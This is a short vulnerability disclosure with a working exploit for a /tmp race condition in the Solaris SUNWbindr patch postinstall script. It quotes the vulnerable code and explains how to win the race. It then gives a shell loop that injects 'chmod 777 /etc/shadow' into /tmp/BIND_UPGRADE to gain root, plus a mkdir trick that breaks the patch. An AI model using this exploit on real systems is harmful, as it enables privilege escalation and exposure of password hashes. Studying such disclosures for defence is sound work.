There is a race condition with the postinstall script for SUNWbindr that if update manager is being used or smpatch while the system is in multi user mode could lead to arbitrary code execution as root.
55f4f7844ec8ab139f894424203bf63b094b9b91024568ca0627ba66f4950a41
There is a race condition with the postinstall script for SUNWbindr that if update manager is being used or
smpatch while the system is in multi user mode could lead to arbitrary code execution as root.
./patches/119784-22/SUNWbindr/install/pkg_postinstall: UPGRADE=${TMP}/BIND_UPGRADE
./patches/119784-22/SUNWbindr/install/postinstall: UPGRADE=${TMP}/BIND_UPGRADE
vulnerable code:
UPGRADE=${TMP}/BIND_UPGRADE
rm -f $UPGRADE
(If I create the file first between these two steps, I should have ownership before it is over written and inject malicious code to get root.)
cat >> $UPGRADE <<-\_UPDATE_START_METHOD
oset=$@ # Remember current options if any.
svc="svc:network/dns/server"
if [ -z "$TMP" ]; then
TMP="/tmp"
fi
Something like:
while(1) {
echo "chmod 777 /etc/shadow" >> /tmp/BIND_UPGRADE;
}
Or repeatedly touching the file and checking for write permission with the existence of the string BIND_UPGRADE in its contents would
also mean you won the race. Then inject malicious code.
At the least you can break the patch by creating a directory
called /tmp/BIND_UPGRADE.
# mkdir /tmp/BIND_UPGRADE
Exploit:
larry@s0l4r1s:/tmp$ while (true) ; do touch /tmp/BIND_UPGRADE ;echo "chmod 777 /etc/shadow" > /tmp/BIND_UPGRADE; done
during patch installation will get /etc/shadow world writeable.